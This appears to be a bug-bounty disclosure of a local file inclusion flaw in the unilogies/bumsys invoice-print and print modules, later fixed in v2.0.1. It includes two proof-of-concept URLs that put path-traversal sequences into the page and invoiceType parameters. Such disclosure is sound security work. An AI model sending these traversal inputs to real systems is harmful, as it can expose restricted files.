LFI in module invoice-print and print in unilogies/bumsys

Valid

Reported on

Feb 23rd 2023

The parameter page and invoiceType is not properly sanitize leads to Local file inclusion

POC : http://demo.bumsys.org/invoice-print/?invoiceType=../../theme/rui/print&msg=; POC : http://demo.bumsys.org/print/?page=../../theme/rui/invoice-print&msg=;

Impact

Could include sensitive and restricted files.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a month ago

Khurshid Alam validated this vulnerability a month ago

mukundbhuva has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Khurshid Alam marked this as fixed in v2.0.1 with commit 256f25 a month ago

Khurshid Alam has been awarded the fix bounty

This vulnerability will not receive a CVE

Khurshid Alam published this vulnerability a month ago

Khurshid Alam

commented a month ago

Maintainer

Good findings. Thank you so much.

to join this conversation